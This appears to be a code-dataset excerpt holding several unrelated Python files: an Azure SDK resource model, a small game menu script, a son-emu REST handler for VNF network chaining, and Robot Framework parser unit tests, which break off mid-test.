"""The resource model definition for a ARM proxy resource. It will have everything other than required location and tags.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource Id for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines or
Microsoft.Storage/storageAccounts.
:vartype type: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ProxyResource, self).__init__(**kwargs)
| 35.353482
| 140
| 0.651502
|
4a0213e98e70b2d516cb4df0cd929847cfbadb40
| 415
|
py
|
Python
|
alura-python/games.py
|
wiltonpaulo/python-fullcourse
|
5befe60221a2e6f8a567a11e2f449245c11b3447
|
[
"MIT"
] | null | null | null |
alura-python/games.py
|
wiltonpaulo/python-fullcourse
|
5befe60221a2e6f8a567a11e2f449245c11b3447
|
[
"MIT"
] | null | null | null |
alura-python/games.py
|
wiltonpaulo/python-fullcourse
|
5befe60221a2e6f8a567a11e2f449245c11b3447
|
[
"MIT"
] | null | null | null |
import guess
import hangman
print(f"*********************************")
print("*** Select one game to play ! ***")
print("*********************************")
print("(1) Hangman!")
print("(2) Guess the Number!")
game = int(input("Which game? "))
if (game == 1):
print(f"Playing -> Game: Hangman! ...")
hangman.play()
elif (game == 2):
print(f"Playing -> Game: Guess the Number! ...")
guess.play()
| 23.055556
| 52
| 0.491566
|
4a0214f9be05e82ed9e70aa7e1e90c035282ef8d
| 2,607
|
py
|
Python
|
src/emuvim/api/rest/network.py
|
xilouris/son-emu
|
0eb78e7246730c70402a58551910ddf66927ada8
|
[
"Apache-2.0"
] | null | null | null |
src/emuvim/api/rest/network.py
|
xilouris/son-emu
|
0eb78e7246730c70402a58551910ddf66927ada8
|
[
"Apache-2.0"
] | null | null | null |
src/emuvim/api/rest/network.py
|
xilouris/son-emu
|
0eb78e7246730c70402a58551910ddf66927ada8
|
[
"Apache-2.0"
] | null | null | null |
import logging
from flask_restful import Resource
from flask import request
import json
logging.basicConfig(level=logging.INFO)
net = None
class NetworkAction(Resource):
"""
Add or remove chains between VNFs. These chain links are implemented as flow entries in the networks' SDN switches.
:param vnf_src_name: VNF name of the source of the link
:param vnf_dst_name: VNF name of the destination of the link
:param vnf_src_interface: VNF interface name of the source of the link
:param vnf_dst_interface: VNF interface name of the destination of the link
:param weight: weight of the link (can be useful for routing calculations)
:param match: OpenFlow match format of the flow entry
:param bidirectional: boolean value if the link needs to be implemented from src to dst and back
:param cookie: cookie value, identifier of the flow entry to be installed.
:return: message string indicating if the chain action is succesful or not
"""
global net
def put(self, vnf_src_name, vnf_dst_name):
logging.debug("REST CALL: network chain add")
command = 'add-flow'
return self._NetworkAction(vnf_src_name, vnf_dst_name, command=command)
def delete(self, vnf_src_name, vnf_dst_name):
logging.debug("REST CALL: network chain remove")
command = 'del-flows'
return self._NetworkAction(vnf_src_name, vnf_dst_name, command=command)
def _NetworkAction(self, vnf_src_name, vnf_dst_name, command=None):
# call DCNetwork method, not really datacenter specific API for now...
# no check if vnfs are really connected to this datacenter...
try:
vnf_src_interface = json.loads(request.json).get("vnf_src_interface")
vnf_dst_interface = json.loads(request.json).get("vnf_dst_interface")
weight = json.loads(request.json).get("weight")
match = json.loads(request.json).get("match")
bidirectional = json.loads(request.json).get("bidirectional")
cookie = json.loads(request.json).get("cookie")
c = net.setChain(
vnf_src_name, vnf_dst_name,
vnf_src_interface=vnf_src_interface,
vnf_dst_interface=vnf_dst_interface,
cmd=command,
weight=weight,
match=match,
bidirectional=bidirectional,
cookie=cookie)
# return setChain response
return str(c), 200
except Exception as ex:
logging.exception("API error.")
return ex.message, 500
| 43.45
| 119
| 0.672804
|
4a0215b2d74a794ba0bce577562fe75e37c05ba3
| 43,088
|
py
|
Python
|
utest/parsing/test_model.py
|
anilameec/robotframework
|
8cd1680f9497c6991d6bcc7d057ab400f7151b9b
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2022-03-13T01:55:04.000Z
|
2022-03-13T01:55:04.000Z
|
utest/parsing/test_model.py
|
anilameec/robotframework
|
8cd1680f9497c6991d6bcc7d057ab400f7151b9b
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
utest/parsing/test_model.py
|
anilameec/robotframework
|
8cd1680f9497c6991d6bcc7d057ab400f7151b9b
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
import ast
import os
import unittest
import tempfile
from pathlib import Path
from robot.parsing import get_model, get_resource_model, ModelVisitor, ModelTransformer, Token
from robot.parsing.model.blocks import (
CommentSection, File, For, If, Try, While,
Keyword, KeywordSection, SettingSection, TestCase, TestCaseSection, VariableSection
)
from robot.parsing.model.statements import (
Arguments, Break, Comment, Continue, Documentation, ForHeader, End, ElseHeader,
ElseIfHeader, EmptyLine, Error, IfHeader, InlineIfHeader, TryHeader, ExceptHeader,
FinallyHeader, KeywordCall, KeywordName, ReturnStatement, SectionHeader,
TestCaseName, Variable, WhileHeader
)
from robot.utils.asserts import assert_equal, assert_raises_with_msg
from parsing_test_utils import assert_model, RemoveNonDataTokensVisitor
DATA = '''\
*** Test Cases ***
Example
# Comment
Keyword arg
...\targh
\t\t
*** Keywords ***
# Comment continues
Keyword
[Arguments] ${arg1} ${arg2}
Log Got ${arg1} and ${arg}!
RETURN x
'''
PATH = os.path.join(os.getenv('TEMPDIR') or tempfile.gettempdir(), 'test_model.robot')
EXPECTED = File(sections=[
CommentSection(
body=[
EmptyLine([
Token('EOL', '\n', 1, 0)
])
]
),
TestCaseSection(
header=SectionHeader([
Token('TESTCASE HEADER', '*** Test Cases ***', 2, 0),
Token('EOL', '\n', 2, 18)
]),
body=[
EmptyLine([Token('EOL', '\n', 3, 0)]),
TestCase(
header=TestCaseName([
Token('TESTCASE NAME', 'Example', 4, 0),
Token('EOL', '\n', 4, 7)
]),
body=[
Comment([
Token('SEPARATOR', ' ', 5, 0),
Token('COMMENT', '# Comment', 5, 2),
Token('EOL', '\n', 5, 11),
]),
KeywordCall([
Token('SEPARATOR', ' ', 6, 0),
Token('KEYWORD', 'Keyword', 6, 4),
Token('SEPARATOR', ' ', 6, 11),
Token('ARGUMENT', 'arg', 6, 15),
Token('EOL', '\n', 6, 18),
Token('SEPARATOR', ' ', 7, 0),
Token('CONTINUATION', '...', 7, 4),
Token('SEPARATOR', '\t', 7, 7),
Token('ARGUMENT', 'argh', 7, 8),
Token('EOL', '\n', 7, 12)
]),
EmptyLine([Token('EOL', '\n', 8, 0)]),
EmptyLine([Token('EOL', '\t\t\n', 9, 0)])
]
)
]
),
KeywordSection(
header=SectionHeader([
Token('KEYWORD HEADER', '*** Keywords ***', 10, 0),
Token('EOL', '\n', 10, 16)
]),
body=[
Comment([
Token('COMMENT', '# Comment', 11, 0),
Token('SEPARATOR', ' ', 11, 9),
Token('COMMENT', 'continues', 11, 13),
Token('EOL', '\n', 11, 22),
]),
Keyword(
header=KeywordName([
Token('KEYWORD NAME', 'Keyword', 12, 0),
Token('EOL', '\n', 12, 7)
]),
body=[
Arguments([
Token('SEPARATOR', ' ', 13, 0),
Token('ARGUMENTS', '[Arguments]', 13, 4),
Token('SEPARATOR', ' ', 13, 15),
Token('ARGUMENT', '${arg1}', 13, 19),
Token('SEPARATOR', ' ', 13, 26),
Token('ARGUMENT', '${arg2}', 13, 30),
Token('EOL', '\n', 13, 37)
]),
KeywordCall([
Token('SEPARATOR', ' ', 14, 0),
Token('KEYWORD', 'Log', 14, 4),
Token('SEPARATOR', ' ', 14, 7),
Token('ARGUMENT', 'Got ${arg1} and ${arg}!', 14, 11),
Token('EOL', '\n', 14, 34)
]),
ReturnStatement([
Token('SEPARATOR', ' ', 15, 0),
Token('RETURN STATEMENT', 'RETURN', 15, 4),
Token('SEPARATOR', ' ', 15, 10),
Token('ARGUMENT', 'x', 15, 14),
Token('EOL', '\n', 15, 15)
])
]
)
]
)
])
class TestGetModel(unittest.TestCase):
@classmethod
def setUpClass(cls):
with open(PATH, 'w') as f:
f.write(DATA)
@classmethod
def tearDownClass(cls):
os.remove(PATH)
def test_from_string(self):
model = get_model(DATA)
assert_model(model, EXPECTED)
def test_from_path_as_string(self):
model = get_model(PATH)
assert_model(model, EXPECTED, source=PATH)
def test_from_path_as_path(self):
model = get_model(Path(PATH))
assert_model(model, EXPECTED, source=PATH)
def test_from_open_file(self):
with open(PATH) as f:
model = get_model(f)
assert_model(model, EXPECTED)
class TestSaveModel(unittest.TestCase):
@classmethod
def setUpClass(cls):
with open(PATH, 'w') as f:
f.write(DATA)
@classmethod
def tearDownClass(cls):
os.remove(PATH)
def test_save_to_original_path(self):
model = get_model(PATH)
os.remove(PATH)
model.save()
assert_model(get_model(PATH), EXPECTED, source=PATH)
def test_save_to_different_path(self):
model = get_model(PATH)
different = PATH + '.robot'
model.save(different)
assert_model(get_model(different), EXPECTED, source=different)
def test_save_to_original_path_as_path(self):
model = get_model(Path(PATH))
os.remove(PATH)
model.save()
assert_model(get_model(PATH), EXPECTED, source=PATH)
def test_save_to_different_path_as_path(self):
model = get_model(PATH)
different = PATH + '.robot'
model.save(Path(different))
assert_model(get_model(different), EXPECTED, source=different)
def test_save_to_original_fails_if_source_is_not_path(self):
message = 'Saving model requires explicit output ' \
'when original source is not path.'
assert_raises_with_msg(TypeError, message, get_model(DATA).save)
with open(PATH) as f:
assert_raises_with_msg(TypeError, message, get_model(f).save)
class TestForLoop(unittest.TestCase):
def test_valid(self):
model = get_model('''\
*** Test Cases ***
Example
FOR ${x} IN a b c
Log ${x}
END
''', data_only=True)
loop = model.sections[0].body[0].body[0]
expected = For(
header=ForHeader([
Token(Token.FOR, 'FOR', 3, 4),
Token(Token.VARIABLE, '${x}', 3, 11),
Token(Token.FOR_SEPARATOR, 'IN', 3, 19),
Token(Token.ARGUMENT, 'a', 3, 25),
Token(Token.ARGUMENT, 'b', 3, 30),
Token(Token.ARGUMENT, 'c', 3, 35),
]),
body=[
KeywordCall([Token(Token.KEYWORD, 'Log', 4, 8),
Token(Token.ARGUMENT, '${x}', 4, 15)])
],
end=End([
Token(Token.END, 'END', 5, 4)
])
)
assert_model(loop, expected)
def test_nested(self):
model = get_model('''\
*** Test Cases ***
Example
FOR ${x} IN 1 2
FOR ${y} IN RANGE ${x}
Log ${y}
END
END
''', data_only=True)
loop = model.sections[0].body[0].body[0]
expected = For(
header=ForHeader([
Token(Token.FOR, 'FOR', 3, 4),
Token(Token.VARIABLE, '${x}', 3, 11),
Token(Token.FOR_SEPARATOR, 'IN', 3, 19),
Token(Token.ARGUMENT, '1', 3, 25),
Token(Token.ARGUMENT, '2', 3, 30),
]),
body=[
For(
header=ForHeader([
Token(Token.FOR, 'FOR', 4, 8),
Token(Token.VARIABLE, '${y}', 4, 15),
Token(Token.FOR_SEPARATOR, 'IN RANGE', 4, 23),
Token(Token.ARGUMENT, '${x}', 4, 35),
]),
body=[
KeywordCall([Token(Token.KEYWORD, 'Log', 5, 12),
Token(Token.ARGUMENT, '${y}', 5, 19)])
],
end=End([
Token(Token.END, 'END', 6, 8)
])
)
],
end=End([
Token(Token.END, 'END', 7, 4)
])
)
assert_model(loop, expected)
def test_invalid(self):
model = get_model('''\
*** Test Cases ***
Example
FOR
END ooops
FOR wrong IN
''', data_only=True)
loop1, loop2 = model.sections[0].body[0].body
expected1 = For(
header=ForHeader(
tokens=[Token(Token.FOR, 'FOR', 3, 4)],
errors=('FOR loop has no loop variables.',
"FOR loop has no 'IN' or other valid separator."),
),
end=End(
tokens=[Token(Token.END, 'END', 4, 4),
Token(Token.ARGUMENT, 'ooops', 4, 11)],
errors=("END does not accept arguments, got 'ooops'.",)
),
errors=('FOR loop has empty body.',)
)
expected2 = For(
header=ForHeader(
tokens=[Token(Token.FOR, 'FOR', 6, 4),
Token(Token.VARIABLE, 'wrong', 6, 11),
Token(Token.FOR_SEPARATOR, 'IN', 6, 20)],
errors=("FOR loop has invalid loop variable 'wrong'.",
"FOR loop has no loop values."),
),
errors=('FOR loop has empty body.',
'FOR loop has no closing END.')
)
assert_model(loop1, expected1)
assert_model(loop2, expected2)
class TestWhileLoop(unittest.TestCase):
def test_valid(self):
model = get_model('''\
*** Test Cases ***
Example
WHILE True
Log ${x}
END
''', data_only=True)
loop = model.sections[0].body[0].body[0]
expected = While(
header=WhileHeader([
Token(Token.WHILE, 'WHILE', 3, 4),
Token(Token.ARGUMENT, 'True', 3, 13),
]),
body=[
KeywordCall([Token(Token.KEYWORD, 'Log', 4, 8),
Token(Token.ARGUMENT, '${x}', 4, 15)])
],
end=End([
Token(Token.END, 'END', 5, 4)
])
)
assert_model(loop, expected)
def test_header_parsing(self):
model = get_model('''\
*** Test Cases ***
Example
WHILE True limit=100
Log ${x}
END
''', data_only=False)
header = model.sections[0].body[0].body[0].header
expected = WhileHeader([
Token(Token.SEPARATOR, ' ', 3, 0),
Token(Token.WHILE, 'WHILE', 3, 4),
Token(Token.SEPARATOR, ' ', 3, 9),
Token(Token.ARGUMENT, 'True', 3, 13),
Token(Token.SEPARATOR, ' ', 3, 17),
Token(Token.OPTION, 'limit=100', 3, 21),
Token(Token.EOL, '\n', 3, 30),
])
assert_model(header, expected)
class TestIf(unittest.TestCase):
def test_if(self):
model = get_model('''\
*** Test Cases ***
Example
IF True
Keyword
Another argument
END
''', data_only=True)
node = model.sections[0].body[0].body[0]
expected = If(
header=IfHeader([
Token(Token.IF, 'IF', 3, 4),
Token(Token.ARGUMENT, 'True', 3, 10),
]),
body=[
KeywordCall([Token(Token.KEYWORD, 'Keyword', 4, 8)]),
KeywordCall([Token(Token.KEYWORD, 'Another', 5, 8),
Token(Token.ARGUMENT, 'argument', 5, 19)])
],
end=End([Token(Token.END, 'END', 6, 4)])
)
assert_model(node, expected)
def test_if_else_if_else(self):
model = get_model('''\
*** Test Cases ***
Example
IF True
K1
ELSE IF False
K2
ELSE
K3
END
''', data_only=True)
node = model.sections[0].body[0].body[0]
expected = If(
header=IfHeader([
Token(Token.IF, 'IF', 3, 4),
Token(Token.ARGUMENT, 'True', 3, 10),
]),
body=[
KeywordCall([Token(Token.KEYWORD, 'K1', 4, 8)])
],
orelse=If(
header=ElseIfHeader([
Token(Token.ELSE_IF, 'ELSE IF', 5, 4),
Token(Token.ARGUMENT, 'False', 5, 15),
]),
body=[
KeywordCall([Token(Token.KEYWORD, 'K2', 6, 8)])
],
orelse=If(
header=ElseHeader([
Token(Token.ELSE, 'ELSE', 7, 4),
]),
body=[
KeywordCall([Token(Token.KEYWORD, 'K3', 8, 8)])
],
)
),
end=End([Token(Token.END, 'END', 9, 4)])
)
assert_model(node, expected)
def test_nested(self):
model = get_model('''\
*** Test Cases ***
Example
IF ${x}
Log ${x}
IF ${y}
Log ${y}
ELSE
Log ${z}
END
END
''', data_only=True)
node = model.sections[0].body[0].body[0]
expected = If(
header=IfHeader([
Token(Token.IF, 'IF', 3, 4),
Token(Token.ARGUMENT, '${x}', 3, 10),
]),
body=[
KeywordCall([Token(Token.KEYWORD, 'Log', 4, 8),
Token(Token.ARGUMENT, '${x}', 4, 15)]),
If(
header=IfHeader([
Token(Token.IF, 'IF', 5, 8),
Token(Token.ARGUMENT, '${y}', 5, 14),
]),
body=[
KeywordCall([Token(Token.KEYWORD, 'Log', 6, 12),
Token(Token.ARGUMENT, '${y}', 6, 19)])
],
orelse=If(
header=ElseHeader([
Token(Token.ELSE, 'ELSE', 7, 8)
]),
body=[
KeywordCall([Token(Token.KEYWORD, 'Log', 8, 12),
Token(Token.ARGUMENT, '${z}', 8, 19)])
]
),
end=End([
Token(Token.END, 'END', 9, 8)
])
)
],
end=End([
Token(Token.END, 'END', 10, 4)
])
)
assert_model(node, expected)
def test_invalid(self):
model = get_model('''\
*** Test Cases ***
Example
IF
ELSE ooops
ELSE IF
END ooops
IF
''', data_only=True)
if1, if2 = model.sections[0].body[0].body
expected1 = If(
header=IfHeader(
tokens=[Token(Token.IF, 'IF', 3, 4)],
errors=('IF must have a condition.',)
),
orelse=If(
header=ElseHeader(
tokens=[Token(Token.ELSE, 'ELSE', 4, 4),
Token(Token.ARGUMENT, 'ooops', 4, 12)],
errors=("ELSE does not accept arguments, got 'ooops'.",)
),
orelse=If(
header=ElseIfHeader(
tokens=[Token(Token.ELSE_IF, 'ELSE IF', 5, 4)],
errors=('ELSE IF must have a condition.',)
),
errors=('ELSE IF branch cannot be empty.',)
),
errors=('ELSE branch cannot be empty.',)
),
end=End(
tokens=[Token(Token.END, 'END', 6, 4),
Token(Token.ARGUMENT, 'ooops', 6, 11)],
errors=("END does not accept arguments, got 'ooops'.",)
),
errors=('IF branch cannot be empty.',
'ELSE IF after ELSE.')
)
expected2 = If(
header=IfHeader(
tokens=[Token(Token.IF, 'IF', 8, 4)],
errors=('IF must have a condition.',)
),
errors=('IF branch cannot be empty.',
'IF has no closing END.')
)
assert_model(if1, expected1)
assert_model(if2, expected2)
class TestInlineIf(unittest.TestCase):
def test_if(self):
model = get_model('''\
*** Test Cases ***
Example
IF True Keyword
''', data_only=True)
node = model.sections[0].body[0].body[0]
expected = If(
header=InlineIfHeader([Token(Token.INLINE_IF, 'IF', 3, 4),
Token(Token.ARGUMENT, 'True', 3, 10)]),
body=[KeywordCall([Token(Token.KEYWORD, 'Keyword', 3, 18)])],
end=End([Token(Token.END, '', 3, 25)])
)
assert_model(node, expected)
def test_if_else_if_else(self):
model = get_model('''\
*** Test Cases ***
Example
IF True K1 ELSE IF False K2 ELSE K3
''', data_only=True)
node = model.sections[0].body[0].body[0]
expected = If(
header=InlineIfHeader([Token(Token.INLINE_IF, 'IF', 3, 4),
Token(Token.ARGUMENT, 'True', 3, 10)]),
body=[KeywordCall([Token(Token.KEYWORD, 'K1', 3, 18)])],
orelse=If(
header=ElseIfHeader([Token(Token.ELSE_IF, 'ELSE IF', 3, 24),
Token(Token.ARGUMENT, 'False', 3, 35)]),
body=[KeywordCall([Token(Token.KEYWORD, 'K2', 3, 44)])],
orelse=If(
header=ElseHeader([Token(Token.ELSE, 'ELSE', 3, 50)]),
body=[KeywordCall([Token(Token.KEYWORD, 'K3', 3, 58)])],
)
),
end=End([Token(Token.END, '', 3, 60)])
)
assert_model(node, expected)
def test_nested(self):
model = get_model('''\
*** Test Cases ***
Example
IF ${x} IF ${y} K1 ELSE IF ${z} K2
''', data_only=True)
node = model.sections[0].body[0].body[0]
expected = If(
header=InlineIfHeader([Token(Token.INLINE_IF, 'IF', 3, 4),
Token(Token.ARGUMENT, '${x}', 3, 10)]),
body=[If(
header=InlineIfHeader([Token(Token.INLINE_IF, 'IF', 3, 18),
Token(Token.ARGUMENT, '${y}', 3, 24)]),
body=[KeywordCall([Token(Token.KEYWORD, 'K1', 3, 32)])],
orelse=If(
header=ElseHeader([Token(Token.ELSE, 'ELSE', 3, 38)]),
body=[If(
header=InlineIfHeader([Token(Token.INLINE_IF, 'IF', 3, 46),
Token(Token.ARGUMENT, '${z}', 3, 52)]),
body=[KeywordCall([Token(Token.KEYWORD, 'K2', 3, 60)])],
end=End([Token(Token.END, '', 3, 62)]),
)],
),
errors=('Inline IF cannot be nested.',),
)],
errors=('Inline IF cannot be nested.',),
)
assert_model(node, expected)
def test_assign(self):
model = get_model('''\
*** Test Cases ***
Example
${x} = IF True K1 ELSE K2
''', data_only=True)
node = model.sections[0].body[0].body[0]
expected = If(
header=InlineIfHeader([Token(Token.ASSIGN, '${x} =', 3, 4),
Token(Token.INLINE_IF, 'IF', 3, 14),
Token(Token.ARGUMENT, 'True', 3, 20)]),
body=[KeywordCall([Token(Token.KEYWORD, 'K1', 3, 28)])],
orelse=If(
header=ElseHeader([Token(Token.ELSE, 'ELSE', 3, 34)]),
body=[KeywordCall([Token(Token.KEYWORD, 'K2', 3, 42)])],
),
end=End([Token(Token.END, '', 3, 44)])
)
assert_model(node, expected)
def test_invalid(self):
model = get_model('''\
*** Test Cases ***
Example
${x} = ${y} IF ELSE ooops ELSE IF
''', data_only=True)
node = model.sections[0].body[0].body[0]
expected = If(
header=InlineIfHeader([Token(Token.ASSIGN, '${x} =', 3, 4),
Token(Token.ASSIGN, '${y}', 3, 14),
Token(Token.INLINE_IF, 'IF', 3, 22),
Token(Token.ARGUMENT, 'ELSE', 3, 28)]),
body=[KeywordCall([Token(Token.KEYWORD, 'ooops', 3, 36)])],
orelse=If(
header=ElseIfHeader([Token(Token.ELSE_IF, 'ELSE IF', 3, 45)],
errors=('ELSE IF must have a condition.',)),
errors=('ELSE IF branch cannot be empty.',),
),
end=End([Token(Token.END, '', 3, 52)])
)
assert_model(node, expected)
class TestTry(unittest.TestCase):
def test_try_except_else_finally(self):
for data_only in [True, False]:
with self.subTest(data_only=data_only):
model = get_model('''\
*** Test Cases ***
Example
TRY
Fail Oh no!
EXCEPT does not match
No operation
EXCEPT AS ${exp}
Log Catch
ELSE
No operation
FINALLY
Log finally here!
END
''', data_only=data_only)
node = model.sections[0].body[0].body[0]
expected = Try(
header=TryHeader([Token(Token.TRY, 'TRY', 3, 4)]),
body=[KeywordCall([Token(Token.KEYWORD, 'Fail', 4, 8),
Token(Token.ARGUMENT, 'Oh no!', 4, 16)])],
next=Try(
header=ExceptHeader([Token(Token.EXCEPT, 'EXCEPT', 5, 4),
Token(Token.ARGUMENT, 'does not match', 5, 13)]),
body=[KeywordCall((Token(Token.KEYWORD, 'No operation', 6, 8),))],
next=Try(
header=ExceptHeader((Token(Token.EXCEPT, 'EXCEPT', 7, 4),
Token(Token.AS, 'AS', 7, 14),
Token(Token.VARIABLE, '${exp}', 7, 20))),
body=[KeywordCall((Token(Token.KEYWORD, 'Log', 8, 8),
Token(Token.ARGUMENT, 'Catch', 8, 15)))],
next=Try(
header=ElseHeader((Token(Token.ELSE, 'ELSE', 9, 4),)),
body=[KeywordCall((Token(Token.KEYWORD, 'No operation', 10, 8),))],
next=Try(
header=FinallyHeader((Token(Token.FINALLY, 'FINALLY', 11, 4),)),
body=[KeywordCall((Token(Token.KEYWORD, 'Log', 12, 8),
Token(Token.ARGUMENT, 'finally here!', 12, 15)))]
)
)
)
),
end=End([Token(Token.END, 'END', 13, 4)])
)
if not data_only:
RemoveNonDataTokensVisitor().visit(node)
assert_model(node, expected)
class TestVariables(unittest.TestCase):
def test_valid(self):
model = get_model('''\
*** Variables ***
${x} value
@{y}= two values
&{z} = one=item
''', data_only=True)
expected = VariableSection(
header=SectionHeader(
tokens=[Token(Token.VARIABLE_HEADER, '*** Variables ***', 1, 0)]
),
body=[
Variable([Token(Token.VARIABLE, '${x}', 2, 0),
Token(Token.ARGUMENT, 'value', 2, 10)]),
Variable([Token(Token.VARIABLE, '@{y}=', 3, 0),
Token(Token.ARGUMENT, 'two', 3, 10),
Token(Token.ARGUMENT, 'values', 3, 17)]),
Variable([Token(Token.VARIABLE, '&{z} =', 4, 0),
Token(Token.ARGUMENT, 'one=item', 4, 10)]),
]
)
assert_model(model.sections[0], expected)
def test_invalid(self):
model = get_model('''\
*** Variables ***
Ooops I did it again
${} invalid
${x}== invalid
${not closed
invalid
&{dict} invalid ${invalid}
''', data_only=True)
expected = VariableSection(
header=SectionHeader(
tokens=[Token(Token.VARIABLE_HEADER, '*** Variables ***', 1, 0)]
),
body=[
Variable(
tokens=[Token(Token.VARIABLE, 'Ooops', 2, 0),
Token(Token.ARGUMENT, 'I did it again', 2, 10)],
errors=("Invalid variable name 'Ooops'.",)
),
Variable(
tokens=[Token(Token.VARIABLE, '${}', 3, 0),
Token(Token.ARGUMENT, 'invalid', 3, 10)],
errors=("Invalid variable name '${}'.",)
),
Variable(
tokens=[Token(Token.VARIABLE, '${x}==', 4, 0),
Token(Token.ARGUMENT, 'invalid', 4, 10)],
errors=("Invalid variable name '${x}=='.",)
),
Variable(
tokens=[Token(Token.VARIABLE, '${not', 5, 0),
Token(Token.ARGUMENT, 'closed', 5, 10)],
errors=("Invalid variable name '${not'.",)
),
Variable(
tokens=[Token(Token.VARIABLE, '', 6, 0),
Token(Token.ARGUMENT, 'invalid', 6, 10)],
errors=("Invalid variable name ''.",)
),
Variable(
tokens=[Token(Token.VARIABLE, '&{dict}', 7, 0),
Token(Token.ARGUMENT, 'invalid', 7, 10),
Token(Token.ARGUMENT, '${invalid}', 7, 21)],
errors=("Invalid dictionary variable item 'invalid'. "
"Items must use 'name=value' syntax or be dictionary variables themselves.",
"Invalid dictionary variable item '${invalid}'. "
"Items must use 'name=value' syntax or be dictionary variables themselves.")
),
]
)
assert_model(model.sections[0], expected)
class TestKeyword(unittest.TestCase):
def test_invalid_arg_spec(self):
model = get_model('''\
*** Keywords ***
Invalid
[Arguments] ooops ${optional}=default ${required}
... @{too} @{many} &{notlast} ${x}
''', data_only=True)
expected = KeywordSection(
header=SectionHeader(
tokens=[Token(Token.KEYWORD_HEADER, '*** Keywords ***', 1, 0)]
),
body=[
Keyword(
header=KeywordName(
tokens=[Token(Token.KEYWORD_NAME, 'Invalid', 2, 0)]
),
body=[
Arguments(
tokens=[Token(Token.ARGUMENTS, '[Arguments]', 3, 4),
Token(Token.ARGUMENT, 'ooops', 3, 19),
Token(Token.ARGUMENT, '${optional}=default', 3, 28),
Token(Token.ARGUMENT, '${required}', 3, 51),
Token(Token.ARGUMENT, '@{too}', 4, 11),
Token(Token.ARGUMENT, '@{many}', 4, 21),
Token(Token.ARGUMENT, '&{notlast}', 4, 32),
Token(Token.ARGUMENT, '${x}', 4, 46)],
errors=("Invalid argument syntax 'ooops'.",
'Non-default argument after default arguments.',
'Cannot have multiple varargs.',
'Only last argument can be kwargs.')
)
],
)
]
)
assert_model(model.sections[0], expected)
class TestControlStatements(unittest.TestCase):
def test_return(self):
model = get_model('''\
*** Keywords ***
Name
Return RETURN
RETURN RETURN
''', data_only=True)
expected = KeywordSection(
header=SectionHeader(
tokens=[Token(Token.KEYWORD_HEADER, '*** Keywords ***', 1, 0)]
),
body=[
Keyword(
header=KeywordName(
tokens=[Token(Token.KEYWORD_NAME, 'Name', 2, 0)]
),
body=[
KeywordCall([Token(Token.KEYWORD, 'Return', 3, 4),
Token(Token.ARGUMENT, 'RETURN', 3, 14)]),
ReturnStatement([Token(Token.RETURN_STATEMENT, 'RETURN', 4, 4),
Token(Token.ARGUMENT, 'RETURN', 4, 14)])
],
)
]
)
assert_model(model.sections[0], expected)
def test_break(self):
model = get_model('''\
*** Keywords ***
Name
WHILE True
Break BREAK
BREAK
END
''', data_only=True)
expected = KeywordSection(
header=SectionHeader(
tokens=[Token(Token.KEYWORD_HEADER, '*** Keywords ***', 1, 0)]
),
body=[
Keyword(
header=KeywordName(
tokens=[Token(Token.KEYWORD_NAME, 'Name', 2, 0)]
),
body=[
While(
header=WhileHeader([Token(Token.WHILE, 'WHILE', 3, 4),
Token(Token.ARGUMENT, 'True', 3, 13)]),
body=[KeywordCall([Token(Token.KEYWORD, 'Break', 4, 8),
Token(Token.ARGUMENT, 'BREAK', 4, 17)]),
Break([Token(Token.BREAK, 'BREAK', 5, 8)])],
end=End([Token(Token.END, 'END', 6, 4)])
)
],
)
]
)
assert_model(model.sections[0], expected)
def test_continue(self):
model = get_model('''\
*** Keywords ***
Name
FOR ${x} IN @{stuff}
Continue CONTINUE
CONTINUE
END
''', data_only=True)
expected = KeywordSection(
header=SectionHeader(
tokens=[Token(Token.KEYWORD_HEADER, '*** Keywords ***', 1, 0)]
),
body=[
Keyword(
header=KeywordName(
tokens=[Token(Token.KEYWORD_NAME, 'Name', 2, 0)]
),
body=[
For(
header=ForHeader([Token(Token.FOR, 'FOR', 3, 4),
Token(Token.VARIABLE, '${x}', 3, 11),
Token(Token.FOR_SEPARATOR, 'IN', 3, 19),
Token(Token.ARGUMENT, '@{stuff}', 3, 25)]),
body=[KeywordCall([Token(Token.KEYWORD, 'Continue', 4, 8),
Token(Token.ARGUMENT, 'CONTINUE', 4, 20)]),
Continue([Token(Token.CONTINUE, 'CONTINUE', 5, 8)])],
end=End([Token(Token.END, 'END', 6, 4)])
)
],
)
]
)
assert_model(model.sections[0], expected)
class TestError(unittest.TestCase):
def test_get_errors_from_tokens(self):
assert_equal(Error([Token('ERROR', error='xxx')]).errors,
('xxx',))
assert_equal(Error([Token('ERROR', error='xxx'),
Token('ARGUMENT'),
Token('ERROR', error='yyy')]).errors,
('xxx', 'yyy'))
assert_equal(Error([Token('ERROR', error=e) for e in '0123456789']).errors,
tuple('0123456789'))
def test_get_fatal_errors_from_tokens(self):
assert_equal(Error([Token('FATAL ERROR', error='xxx')]).errors,
('xxx',))
assert_equal(Error([Token('FATAL ERROR', error='xxx'),
Token('ARGUMENT'),
Token('FATAL ERROR', error='yyy')]).errors,
('xxx', 'yyy'))
assert_equal(Error([Token('FATAL ERROR', error=e) for e in '0123456789']).errors,
tuple('0123456789'))
def test_get_errors_and_fatal_errors_from_tokens(self):
assert_equal(Error([Token('ERROR', error='error'),
Token('ARGUMENT'),
Token('FATAL ERROR', error='fatal error')]).errors,
('error', 'fatal error'))
assert_equal(Error([Token('FATAL ERROR', error=e) for e in '0123456789']).errors,
tuple('0123456789'))
def test_model_error(self):
model = get_model('''\
*** Invalid ***
*** Settings ***
Invalid
Documentation
''', data_only=True)
inv_header = (
"Unrecognized section header '*** Invalid ***'. Valid sections: "
"'Settings', 'Variables', 'Test Cases', 'Tasks', 'Keywords' and 'Comments'."
)
inv_setting = "Non-existing setting 'Invalid'."
expected = File([
CommentSection(
body=[
Error([Token('ERROR', '*** Invalid ***', 1, 0, inv_header)])
]
),
SettingSection(
